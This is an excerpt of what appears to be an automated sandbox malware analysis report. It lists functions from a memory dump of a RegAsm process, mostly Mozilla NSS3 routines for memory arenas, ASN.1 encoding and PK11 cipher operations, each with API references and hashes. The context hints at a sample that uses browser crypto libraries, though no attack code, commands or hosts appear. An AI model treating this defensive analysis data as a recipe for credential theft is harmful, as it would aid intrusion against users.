API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
String ID:
API String ID: 3618544408-0
Opcode ID: 7033c866ab41ac893c3abfd09427afd5ca8abaf399ad9d54fc0aaa10fed315f6
Instruction ID: 594f441a76879cc0ae1abdab4235cef64e6cd0ebc84bb24173d55c7d42417623
Opcode Fuzzy Hash: 7033c866ab41ac893c3abfd09427afd5ca8abaf399ad9d54fc0aaa10fed315f6
Instruction Fuzzy Hash: F6212EF3B002845BEB0049E95C45B6B72AEDBD174CFBA4435D83867B42FA75C83582A1

Function 6C15AE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C15AEB3
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C15AECA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C15AEDD
PR_SetError.NSS3(FFFFE022,00000000), ref: 6C15AF02
SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C279500), ref: 6C15AF23

Part of subcall function 6C1AF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C1AF0C8
Part of subcall function 6C1AF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C1AF122

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C15AF37

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
String ID:
API String ID: 3714604333-0
Opcode ID: d52bd2a45041f47fa76f759f89566adeaadf5bf9a2b3a1417ab2685e2363ab49
Instruction ID: 7232a68cbf96476622f46a49d9b07622d245e6ba6480052910d8be25330097b8
Opcode Fuzzy Hash: d52bd2a45041f47fa76f759f89566adeaadf5bf9a2b3a1417ab2685e2363ab49
Instruction Fuzzy Hash: 9C2128F19492006BE7108E189C41BAE7BE4EF8572CF54435AEC34AB780E732D51587B2

Function 6C1DEE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C1DEE85
realloc.MOZGLUE(8420A818,?), ref: 6C1DEEAE
PORT_Alloc_Util.NSS3(?), ref: 6C1DEEC5

Part of subcall function 6C1B0BE0: malloc.MOZGLUE(6C1A8D2D,?,00000000,?), ref: 6C1B0BF8
Part of subcall function 6C1B0BE0: TlsGetValue.KERNEL32(6C1A8D2D,?,00000000,?), ref: 6C1B0C15

htonl.WSOCK32(?), ref: 6C1DEEE3
htonl.WSOCK32(00000000,?), ref: 6C1DEEED
memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C1DEF01

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 1351805024-0
Opcode ID: 5cffda9a84a8f5897f13219074c527c640815d387301a571614594b33de7a9ef
Instruction ID: 8d6f66565d99c8770d681e6beec1bd94d0d569bcfe647b96b7ee472f43c06798
Opcode Fuzzy Hash: 5cffda9a84a8f5897f13219074c527c640815d387301a571614594b33de7a9ef
Instruction Fuzzy Hash: 8C21F171A002159FCF109F28DC80B9AB7A4EF49359F168168EC089B641E731FD14CBE2

Function 6C18EE30 Relevance: 9.1, APIs: 6, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C18EE49

Part of subcall function 6C1AFAB0: free.MOZGLUE(?,-00000001,?,?,6C14F673,00000000,00000000), ref: 6C1AFAC7

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C18EE5C
PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6C18EE77
PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6C18EE9D
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C18EEB3

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
String ID:
API String ID: 886189093-0
Opcode ID: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction ID: 99056052c70ff1413902aed9d965739aa6ae2fdea8784ebe14d466bf631149fb
Opcode Fuzzy Hash: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction Fuzzy Hash: 172102BAA052156BEB118E68DC81FAB77A8EF09708F044164FD089B701EB71DD148BF1

Function 6C1E3C80 Relevance: 9.1, APIs: 6, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6C1E5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C1E5B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1E3D3F

Part of subcall function 6C15BA90: PORT_NewArena_Util.NSS3(00000800,6C1E3CAF,?), ref: 6C15BABF
Part of subcall function 6C15BA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6C1E3CAF,?), ref: 6C15BAD5
Part of subcall function 6C15BA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6C1E3CAF,?), ref: 6C15BB08
Part of subcall function 6C15BA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C1E3CAF,?), ref: 6C15BB1A
Part of subcall function 6C15BA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6C1E3CAF,?), ref: 6C15BB3B

PR_EnterMonitor.NSS3(?), ref: 6C1E3CCB

Part of subcall function 6C219090: TlsGetValue.KERNEL32 ref: 6C2190AB
Part of subcall function 6C219090: TlsGetValue.KERNEL32 ref: 6C2190C9
Part of subcall function 6C219090: EnterCriticalSection.KERNEL32 ref: 6C2190E5
Part of subcall function 6C219090: TlsGetValue.KERNEL32 ref: 6C219116
Part of subcall function 6C219090: LeaveCriticalSection.KERNEL32 ref: 6C21913F

PR_EnterMonitor.NSS3(?), ref: 6C1E3CE2
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C1E3CF8
PR_ExitMonitor.NSS3(?), ref: 6C1E3D15
PR_ExitMonitor.NSS3(?), ref: 6C1E3D2E

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
String ID:
API String ID: 4030862364-0
Opcode ID: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
Instruction ID: b6741bc0f70cd826151b6e8fc7cffd191f4227e0254e3919851e2e7c10ef1877
Opcode Fuzzy Hash: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
Instruction Fuzzy Hash: 49112E75610A045FE7205E65EC417DBB2E5FF15308FD00534E91AC7B30E632F82AC652

Function 6C13AE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C13AFDA

Strings

%s at line %d of [%.10s], xrefs: 6C13AFD3
unable to delete/modify collation sequence due to active statements, xrefs: 6C13AF5C
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C13AFC4
misuse, xrefs: 6C13AFCE

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 632333372-924978290
Opcode ID: 659a9114418a64070b881fed656fa9a96860241ed85bc6e2008ffbe78653ee44
Instruction ID: 06934ace835c96ad08ceb63a7832cd7b46632b367cc682a1f9b10f4c35aad789
Opcode Fuzzy Hash: 659a9114418a64070b881fed656fa9a96860241ed85bc6e2008ffbe78653ee44
Instruction Fuzzy Hash: 7A91F475A052258FDF04CF99C894BAEB7F1BF45318F1954A8E869AB791D334EC01CBA0

Function 6C19FC30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6C19FC55
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C19FCB2
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C19FDB7
PR_SetError.NSS3(FFFFE09A,00000000), ref: 6C19FDDE

Part of subcall function 6C1A8800: TlsGetValue.KERNEL32(?,6C1B085A,00000000,?,6C158369,?), ref: 6C1A8821
Part of subcall function 6C1A8800: TlsGetValue.KERNEL32(?,?,6C1B085A,00000000,?,6C158369,?), ref: 6C1A883D
Part of subcall function 6C1A8800: EnterCriticalSection.KERNEL32(?,?,?,6C1B085A,00000000,?,6C158369,?), ref: 6C1A8856
Part of subcall function 6C1A8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C1A8887
Part of subcall function 6C1A8800: PR_Unlock.NSS3(?,?,?,?,6C1B085A,00000000,?,6C158369,?), ref: 6C1A8899

Strings

pkcs11:, xrefs: 6C19FC4F

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
String ID: pkcs11:
API String ID: 362709927-2446828420
Opcode ID: f6aea579b6c0708b6ce2f6cae3efabfcd532be3f768b7fe357f1ed4ce9494607
Instruction ID: c9635c7d68cbb799c829a8ae1cf1bfd32b1d83f1d9641d8932ec2ddf198a69c1
Opcode Fuzzy Hash: f6aea579b6c0708b6ce2f6cae3efabfcd532be3f768b7fe357f1ed4ce9494607
Instruction Fuzzy Hash: 4951D1B5A04211BBEB008F699C40F9A73B5AF5135CF250025FD295BFA1EB31E915CB92

Function 6C1C6DE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6C1C6E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1C6E57

Part of subcall function 6C1FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C1FC2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6C1C6E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6C1C6EAA

Strings

n&l, xrefs: 6C1C6DF9

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID: n&l
API String ID: 3163584228-653591135
Opcode ID: 3fc57e37e804d14d1d057f797b67458afcd4db186cfe017638bffc9996898fcc
Instruction ID: e8511371ac445a4cce8e31c4312497726b76002aa1072351c2c5af8f5cd45069
Opcode Fuzzy Hash: 3fc57e37e804d14d1d057f797b67458afcd4db186cfe017638bffc9996898fcc
Instruction Fuzzy Hash: 0E31D57171451AEFDB149F34CC043B6B7A4AB3131AF10063EE999D6A80EB39A854CF83

Function 6C140DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C140BDE), ref: 6C140DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6C140BDE), ref: 6C140DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C140BDE), ref: 6C140DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C140BDE), ref: 6C140E32

Strings

%s incr => %d (find lib), xrefs: 6C140E2D

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: 57050e640494631d34ce60da6402193645a8991030d4a80933cea456e9419cd1
Instruction ID: 84b2c05bb94e8106dc2b7273b0ea4a6d18f7b260872617fd375638024a5b5945
Opcode Fuzzy Hash: 57050e640494631d34ce60da6402193645a8991030d4a80933cea456e9419cd1
Instruction Fuzzy Hash: 6E0128B17006249FE7108F269C49E1773ACDB55B09B05842DDD05E7A81E761FC14C7E1

Function 6C181CC0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Initialize), ref: 6C181CD8
PR_LogPrint.NSS3( pInitArgs = 0x%p,?), ref: 6C181CF1

Part of subcall function 6C2609D0: PR_Now.NSS3 ref: 6C260A22
Part of subcall function 6C2609D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C260A35
Part of subcall function 6C2609D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C260A66
Part of subcall function 6C2609D0: PR_GetCurrentThread.NSS3 ref: 6C260A70
Part of subcall function 6C2609D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C260A9D
Part of subcall function 6C2609D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C260AC8
Part of subcall function 6C2609D0: PR_vsmprintf.NSS3(?,?), ref: 6C260AE8
Part of subcall function 6C2609D0: EnterCriticalSection.KERNEL32(?), ref: 6C260B19
Part of subcall function 6C2609D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C260B48
Part of subcall function 6C2609D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C260C76
Part of subcall function 6C2609D0: PR_LogFlush.NSS3 ref: 6C260C7E

Strings

pInitArgs = 0x%p, xrefs: 6C181CEC
C_Initialize, xrefs: 6C181CD3
n&l, xrefs: 6C181D09, 6C181D30

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: PrintR_snprintf$CriticalCurrentDebugEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime
String ID: pInitArgs = 0x%p$C_Initialize$n&l
API String ID: 1907330108-3840952526
Opcode ID: 37151fe39a8e3ecae703c1852e852e393afbf916baa04357230b688269ce2759
Instruction ID: 10fbfb09f81fdd7dd77ecc7938b009e912c96c8eae694e52093499c2e5b466e4
Opcode Fuzzy Hash: 37151fe39a8e3ecae703c1852e852e393afbf916baa04357230b688269ce2759
Instruction Fuzzy Hash: 3D012EF63022409FCB009B29C94CB4933B5EB8231DF184824EC1896AC2DB34E888CB95

Function 6C0E9C60 Relevance: 7.8, APIs: 6, Instructions: 262COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C0E9CF2
LeaveCriticalSection.KERNEL32(?), ref: 6C0E9D45
EnterCriticalSection.KERNEL32(?), ref: 6C0E9D8B
LeaveCriticalSection.KERNEL32(?), ref: 6C0E9DDE

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 50cef1ae840a57a332e34e22aea515575d27e3578f7ce729ea865385bac0b11b
Instruction ID: 294b0764599f2c289ccbccc1e6091f64e2fae07a70cc2384071a3dba82b38605
Opcode Fuzzy Hash: 50cef1ae840a57a332e34e22aea515575d27e3578f7ce729ea865385bac0b11b
Instruction Fuzzy Hash: 31A1A1717441008FDB08AF65E89D7AE37F1AF8A319F18052DDD1657B80DF35A846CB82

Function 6C1FDD70 Relevance: 7.7, APIs: 5, Instructions: 179COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C1FDD8C
LeaveCriticalSection.KERNEL32(00000000), ref: 6C1FDDB4
LeaveCriticalSection.KERNEL32(00000000), ref: 6C1FDE1B
ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6C1FDE77

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CriticalLeaveSection$ReleaseSemaphoreValue
String ID:
API String ID: 2700453212-0
Opcode ID: 02452f419ccf9c967b39dd52ec096e64d169442816872be52976dfa2fe47c21a
Instruction ID: 169ea2d8bc71b475a7b3f5471197a77629d05aed8209ca859ab7be36c1218fc0
Opcode Fuzzy Hash: 02452f419ccf9c967b39dd52ec096e64d169442816872be52976dfa2fe47c21a
Instruction Fuzzy Hash: 0F717771A00314CFDB10EF9AC584AADB7F4BF59718F25816DC9696B742D730A902CF90

Function 6C14EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C14EDFD
calloc.MOZGLUE(00000001,00000000), ref: 6C14EE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C14EECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C14EEEB
free.MOZGLUE(?), ref: 6C14EEF6

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: 13b0a64dc3b9c2d6e9a3424ea2e00603c03b7eefae3c05a8769e819fc05c17fc
Instruction ID: 4bd13f345423cc8fe1a73a21af32030b6c993ba4706562d7abef755d2c2412bb
Opcode Fuzzy Hash: 13b0a64dc3b9c2d6e9a3424ea2e00603c03b7eefae3c05a8769e819fc05c17fc
Instruction Fuzzy Hash: E63106B16002019BD720DF2DCC48B66BBB4FF55308F044528ED5A97A91EB31E614CBE1

Function 6C15AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6C153FFF,00000000,?,?,?,?,?,6C151A1C,00000000,00000000), ref: 6C15ADA7

Part of subcall function 6C1B14C0: TlsGetValue.KERNEL32 ref: 6C1B14E0
Part of subcall function 6C1B14C0: EnterCriticalSection.KERNEL32 ref: 6C1B14F5
Part of subcall function 6C1B14C0: PR_Unlock.NSS3 ref: 6C1B150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C153FFF,00000000,?,?,?,?,?,6C151A1C,00000000,00000000), ref: 6C15ADB4

Part of subcall function 6C1B10C0: TlsGetValue.KERNEL32(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B10F3
Part of subcall function 6C1B10C0: EnterCriticalSection.KERNEL32(?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B110C
Part of subcall function 6C1B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B1141
Part of subcall function 6C1B10C0: PR_Unlock.NSS3(?,?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B1182
Part of subcall function 6C1B10C0: TlsGetValue.KERNEL32(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6C153FFF,?,?,?,?,6C153FFF,00000000,?,?,?,?,?,6C151A1C,00000000), ref: 6C15ADD5

Part of subcall function 6C1AFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C1A8D2D,?,00000000,?), ref: 6C1AFB85
Part of subcall function 6C1AFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C1AFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C2794B0,?,?,?,?,?,?,?,?,6C153FFF,00000000,?), ref: 6C15ADEC

Part of subcall function 6C1AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C2818D0,?), ref: 6C1AB095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C153FFF), ref: 6C15AE3C

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

